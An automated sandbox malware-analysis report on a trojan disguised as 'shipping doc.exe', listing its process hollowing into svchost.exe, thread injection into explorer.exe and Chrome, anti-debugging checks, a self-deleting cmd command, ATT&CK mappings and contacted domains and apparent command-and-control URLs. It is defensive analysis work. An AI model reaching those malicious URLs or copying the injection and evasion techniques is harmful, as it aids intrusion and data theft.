          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]1_2_03A52835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]1_2_03A52835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A52835 mov ecx, dword ptr fs:[00000030h]1_2_03A52835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]1_2_03A52835
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00140B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00140B62
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00112622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00112622
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0010083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0010083F
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_001009D5 SetUnhandledExceptionFilter,0_2_001009D5
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00100C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00100C21

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\shipping doc.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 7344Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 7408Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 7468Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 7512Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 7588Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 7804Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 5D0000Jump to behavior
          Source: C:\Users\user\Desktop\shipping doc.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2E5E008Jump to behavior
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00141201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00141201
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00122BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00122BA5
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0014B226 SendInput,keybd_event,0_2_0014B226
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_001622DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_001622DA
          Source: C:\Users\user\Desktop\shipping doc.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping doc.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00140B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00140B62
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00141663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00141663
          Source: shipping doc.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: shipping doc.exe, explorer.exe, 00000002.00000003.6283803377.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1784638349.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1812353109.0000000004CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.1784638349.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000C.00000000.2039688760.0000026F35350000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.1783542988.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000002.00000000.1784638349.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000C.00000000.2039688760.0000026F35350000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.1784638349.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000C.00000000.2039688760.0000026F35350000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00100698 cpuid 0_2_00100698
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00158195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00158195
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0013D27A GetUserNameW,0_2_0013D27A
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0011BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0011BB6F
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_000E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000E42DE

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 0.2.shipping doc.exe.20d0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.shipping doc.exe.20d0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1781373621.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1895344034.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1898373344.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: shipping doc.exeBinary or memory string: WIN_81
          Source: shipping doc.exeBinary or memory string: WIN_XP
          Source: shipping doc.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: shipping doc.exeBinary or memory string: WIN_XPe
          Source: shipping doc.exeBinary or memory string: WIN_VISTA
          Source: shipping doc.exeBinary or memory string: WIN_7
          Source: shipping doc.exeBinary or memory string: WIN_8

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 0.2.shipping doc.exe.20d0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.shipping doc.exe.20d0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1781373621.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1895344034.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1898373344.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00161204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00161204
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00161806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00161806
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts
          1
          Native API
          1
          DLL Side-Loading
          1
          Exploitation for Privilege Escalation
          1
          Disable or Modify Tools
          21
          Input Capture
          2
          System Time Discovery
          Remote Services1
          Archive Collected Data
          4
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Shared Modules
          2
          Valid Accounts
          1
          DLL Side-Loading
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory1
          Account Discovery
          Remote Desktop Protocol21
          Input Capture
          11
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
          Valid Accounts
          2
          Obfuscated Files or Information
          Security Account Manager1
          File and Directory Discovery
          SMB/Windows Admin Shares3
          Clipboard Data
          4
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation
          1
          DLL Side-Loading
          NTDS115
          System Information Discovery
          Distributed Component Object ModelInput Capture15
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script512
          Process Injection
          2
          Valid Accounts
          LSA Secrets241
          Security Software Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
          Virtualization/Sandbox Evasion
          Cached Domain Credentials12
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
          Access Token Manipulation
          DCSync3
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job512
          Process Injection
          Proc Filesystem11
          Application Window Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          System Owner/User Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435937 Sample: shipping doc.exe Startdate: 03/05/2024 Architecture: WINDOWS Score: 100 39 www.hjgd.xyz 2->39 41 www.yqwija.info 2->41 43 22 other IPs or domains 2->43 67 Snort IDS alert for network traffic 2->67 69 Multi AV Scanner detection for domain / URL 2->69 71 Found malware configuration 2->71 75 8 other signatures 2->75 11 shipping doc.exe 4 2->11         started        14 chrome.exe 1 2->14         started        signatures3 73 Performs DNS queries to domains with low reputation 39->73 process4 dnsIp5 83 Binary is likely a compiled AutoIt script file 11->83 85 Writes to foreign memory regions 11->85 87 Maps a DLL or memory area into another process 11->87 17 svchost.exe 11->17         started        53 192.168.2.4, 138, 443, 49360 unknown unknown 14->53 55 192.168.2.12 unknown unknown 14->55 57 2 other IPs or domains 14->57 20 chrome.exe 14->20         started        signatures6 process7 dnsIp8 59 Modifies the context of a thread in another process (thread injection) 17->59 61 Maps a DLL or memory area into another process 17->61 63 Sample uses process hollowing technique 17->63 65 2 other signatures 17->65 23 explorer.exe 103 7 17->23 injected 45 www.google.com 172.217.165.132, 443, 49744, 49745 GOOGLEUS United States 20->45 signatures9 process10 dnsIp11 47 www.naservus.com 81.19.154.98, 49771, 49773, 80 WORLD4YOUAT Austria 23->47 49 www.reddragondao.com 185.215.4.42, 49766, 80 TVHORADADAES Denmark 23->49 51 8 other IPs or domains 23->51 26 help.exe 23->26         started        process12 signatures13 77 Modifies the context of a thread in another process (thread injection) 26->77 79 Maps a DLL or memory area into another process 26->79 81 Tries to detect virtualization through RDTSC time measurements 26->81 29 cmd.exe 1 26->29         started        31 chrome.exe 26->31 injected 33 chrome.exe 26->33 injected 35 4 other processes 26->35 process14 process15 37 conhost.exe 29->37         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          shipping doc.exe53%ReversingLabsWin32.Trojan.ShellcodeCrypter
          shipping doc.exe56%VirustotalBrowse
          shipping doc.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          www.spesandosupermercato.com1%VirustotalBrowse
          dxtra.shop0%VirustotalBrowse
          thesiamesebetta.biz1%VirustotalBrowse
          www.sol-casino-2023.club1%VirustotalBrowse
          www.prismotrov.com1%VirustotalBrowse
          www.whatpixels.com0%VirustotalBrowse
          www.creditscorewizards.com0%VirustotalBrowse
          www.naservus.com0%VirustotalBrowse
          www.reddragondao.com0%VirustotalBrowse
          www.steam.help5%VirustotalBrowse
          www.dxtra.shop0%VirustotalBrowse
          www.hjgd.xyz0%VirustotalBrowse
          www.jacobmcfarland.dev1%VirustotalBrowse
          www.yourreicapital.com0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://anglebug.com/46330%URL Reputationsafe
          https://anglebug.com/73820%URL Reputationsafe
          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
          http://polymer.github.io/AUTHORS.txt0%URL Reputationsafe
          https://anglebug.com/77140%URL Reputationsafe
          http://anglebug.com/62480%URL Reputationsafe
          http://anglebug.com/69290%URL Reputationsafe
          http://anglebug.com/52810%URL Reputationsafe
          https://anglebug.com/72460%URL Reputationsafe
          https://anglebug.com/73690%URL Reputationsafe
          https://anglebug.com/74890%URL Reputationsafe
          http://polymer.github.io/PATENTS.txt0%URL Reputationsafe
          http://anglebug.com/30780%URL Reputationsafe
          http://anglebug.com/75530%URL Reputationsafe
          http://anglebug.com/53750%URL Reputationsafe
          http://anglebug.com/53710%URL Reputationsafe
          http://anglebug.com/47220%URL Reputationsafe
          http://anglebug.com/75560%URL Reputationsafe
          https://outlook.com_0%URL Reputationsafe
          http://anglebug.com/66920%URL Reputationsafe
          http://anglebug.com/35020%URL Reputationsafe
          http://anglebug.com/36230%URL Reputationsafe
          http://anglebug.com/36250%URL Reputationsafe
          http://anglebug.com/36240%URL Reputationsafe
          https://anglebug.com/7308r20%Avira URL Cloudsafe
          http://anglebug.com/50070%URL Reputationsafe
          http://anglebug.com/38620%URL Reputationsafe
          http://www.hjgd.xyz0%Avira URL Cloudsafe
          http://anglebug.com/3586nML0%Avira URL Cloudsafe
          http://www.naservus.com/ba94/?pratfT=/5mX1cVAfY0ri4HH88Kr/U1YVAUiaH/OilYzSWrvtRaeMzOYw8luwtxtoaBngH3r6SVW&GBZD=NXkDk0%Avira URL Cloudsafe
          http://www.naservus.com/ba94/~~~~~~~~0%Avira URL Cloudsafe
          http://anglebug.com/48360%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          http://anglebug.com/2970hase0%Avira URL Cloudsafe
          http://www.steam.help/ba94/www.galaxyprofituk.com100%Avira URL Cloudphishing
          http://www.galaxyprofituk.com/ba94/www.yqwija.info0%Avira URL Cloudsafe
          http://anglebug.com/3625j0%Avira URL Cloudsafe
          http://www.posteo.lol/ba94/100%Avira URL Cloudmalware
          http://www.hjgd.xyz0%VirustotalBrowse
          http://www.arwile.com/ba94/?pratfT=W24/dTX+nhrci6xk5Vrz5exadXl75jzXfJ/PTNyhNxkzHtpDGR8LH25TWT7FyDO/Clqj&GBZD=NXkDk0%Avira URL Cloudsafe
          http://anglebug.com/2970P0%Avira URL Cloudsafe
          http://www.humidityflash.siteReferer:0%Avira URL Cloudsafe
          http://anglebug.com/3586nML0%VirustotalBrowse
          http://anglebug.com/3625j0%VirustotalBrowse
          http://anglebug.com/5750)0%Avira URL Cloudsafe
          http://www.galaxyprofituk.comReferer:0%Avira URL Cloudsafe
          https://anglebug.com/7369rcent0%Avira URL Cloudsafe
          http://www.sol-casino-2023.clubReferer:0%Avira URL Cloudsafe
          http://www.fijula.com/ba94/0%Avira URL Cloudsafe
          http://anglebug.com/2970P0%VirustotalBrowse
          http://anglebug.com/7279r0%Avira URL Cloudsafe
          http://www.sol-casino-2023.club/ba94/?pratfT=iolsKzgpZ1NBt3juMfuMhkrDq6b7TDA/46a7L9Ma3wfGSQPZnAxkRO739civO1GZyrJ6&E6Ap=B2JhxD0%Avira URL Cloudsafe
          http://www.dxtra.shop/ba94/0%Avira URL Cloudsafe
          http://anglebug.com/7724ancedD0%Avira URL Cloudsafe
          http://www.prismotrov.com0%Avira URL Cloudsafe
          http://127.0.0.1:0%Avira URL Cloudsafe
          http://www.creditscorewizards.comReferer:0%Avira URL Cloudsafe
          http://www.prismotrov.com/ba94/www.reddragondao.com0%Avira URL Cloudsafe
          http://anglebug.com/5750)0%VirustotalBrowse
          http://www.thesiamesebetta.biz/ba94/?pratfT=EPgCOY9cvZq7qozCRkZFGMl16i9BJA11xMSrv9iq5fczmqSZt0yo+vxnS1dzo2vm21b4&E6Ap=B2JhxD0%Avira URL Cloudsafe
          http://www.creditscorewizards.com/ba94/0%Avira URL Cloudsafe
          http://anglebug.com/5535ing0%Avira URL Cloudsafe
          http://www.naservus.com/ba94/?pratfT=/5mX1cVAfY0ri4HH88Kr/U1YVAUiaH/OilYzSWrvtRaeMzOYw8luwtxtoaBngH3r6SVW&E6Ap=B2JhxD0%Avira URL Cloudsafe
          http://anglebug.com/7036ning0%Avira URL Cloudsafe
          http://www.steam.helpReferer:0%Avira URL Cloudsafe
          http://www.hjgd.xyz/ba94/0%Avira URL Cloudsafe
          http://www.thesiamesebetta.bizReferer:0%Avira URL Cloudsafe
          http://anglebug.com/5007yE0%Avira URL Cloudsafe
          http://www.dxtra.shop/ba94/?pratfT=mqF7ecV0fTrt7RumtuPBWgaPRte4eeCjTo6sX4dmZEZ1SPnDloKMCAAIcJIupYJjrOQM&E6Ap=B2JhxD0%Avira URL Cloudsafe
          http://anglebug.com/5375armUp0%Avira URL Cloudsafe
          http://www.naservus.com0%Avira URL Cloudsafe
          http://www.yourreicapital.com/ba94/www.fijula.com0%Avira URL Cloudsafe
          http://www.yqwija.info/ba94/www.posteo.lol0%Avira URL Cloudsafe
          http://anglebug.com/3452http://anglebug.com/53750%Avira URL Cloudsafe
          http://www.hjgd.xyz/ba94/www.naservus.com0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.spesandosupermercato.com
          81.88.63.46
          truetrueunknown
          dxtra.shop
          89.117.27.198
          truetrueunknown
          thesiamesebetta.biz
          3.33.130.190
          truetrueunknown
          www.sol-casino-2023.club
          103.224.212.217
          truetrueunknown
          www.prismotrov.com
          87.236.19.19
          truetrueunknown
          parkingpage.namecheap.com
          91.195.240.19
          truefalse
            high
            www.whatpixels.com
            91.195.240.117
            truetrueunknown
            www.galaxyprofituk.com
            199.15.163.139
            truetrue
              unknown
              www.creditscorewizards.com
              45.43.211.76
              truetrueunknown
              www.naservus.com
              81.19.154.98
              truetrueunknown
              94950.bodis.com
              199.59.243.225
              truefalse
                high
                webdevmcfarland.github.io
                185.199.110.153
                truetrue
                  unknown
                  www.reddragondao.com
                  185.215.4.42
                  truetrueunknown
                  www.google.com
                  172.217.165.132
                  truefalse
                    high
                    www.hjgd.xyz
                    203.161.58.65
                    truetrueunknown
                    www.fijula.com
                    unknown
                    unknowntrue
                      unknown
                      www.arwile.com
                      unknown
                      unknowntrue
                        unknown
                        www.humidityflash.site
                        unknown
                        unknowntrue
                          unknown
                          www.yqwija.info
                          unknown
                          unknowntrue
                            unknown
                            www.thesiamesebetta.biz
                            unknown
                            unknowntrue
                              unknown
                              www.jacobmcfarland.dev
                              unknown
                              unknowntrueunknown
                              www.steam.help
                              unknown
                              unknowntrueunknown
                              www.dxtra.shop
                              unknown
                              unknowntrueunknown
                              www.yourreicapital.com
                              unknown
                              unknowntrueunknown
                              www.posteo.lol
                              unknown
                              unknowntrue
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                http://www.naservus.com/ba94/?pratfT=/5mX1cVAfY0ri4HH88Kr/U1YVAUiaH/OilYzSWrvtRaeMzOYw8luwtxtoaBngH3r6SVW&GBZD=NXkDktrue
                                • Avira URL Cloud: safe
                                unknown
                                http://www.arwile.com/ba94/?pratfT=W24/dTX+nhrci6xk5Vrz5exadXl75jzXfJ/PTNyhNxkzHtpDGR8LH25TWT7FyDO/Clqj&GBZD=NXkDktrue
                                • Avira URL Cloud: safe
                                unknown
                                https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YOPbGMyN07EGIjACfJfOCNaD4TISjycM0JORvJFhG5ZwTBYCNVHc3-u05-7gGaBns57LrR4GTdhD_MIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                                  high
                                  http://www.sol-casino-2023.club/ba94/?pratfT=iolsKzgpZ1NBt3juMfuMhkrDq6b7TDA/46a7L9Ma3wfGSQPZnAxkRO739civO1GZyrJ6&E6Ap=B2JhxDtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.thesiamesebetta.biz/ba94/?pratfT=EPgCOY9cvZq7qozCRkZFGMl16i9BJA11xMSrv9iq5fczmqSZt0yo+vxnS1dzo2vm21b4&E6Ap=B2JhxDtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.naservus.com/ba94/?pratfT=/5mX1cVAfY0ri4HH88Kr/U1YVAUiaH/OilYzSWrvtRaeMzOYw8luwtxtoaBngH3r6SVW&E6Ap=B2JhxDtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.dxtra.shop/ba94/?pratfT=mqF7ecV0fTrt7RumtuPBWgaPRte4eeCjTo6sX4dmZEZ1SPnDloKMCAAIcJIupYJjrOQM&E6Ap=B2JhxDtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://aka.ms/odirmrexplorer.exe, 00000002.00000003.3111309486.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1812586501.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    http://www.naservus.com/ba94/~~~~~~~~explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
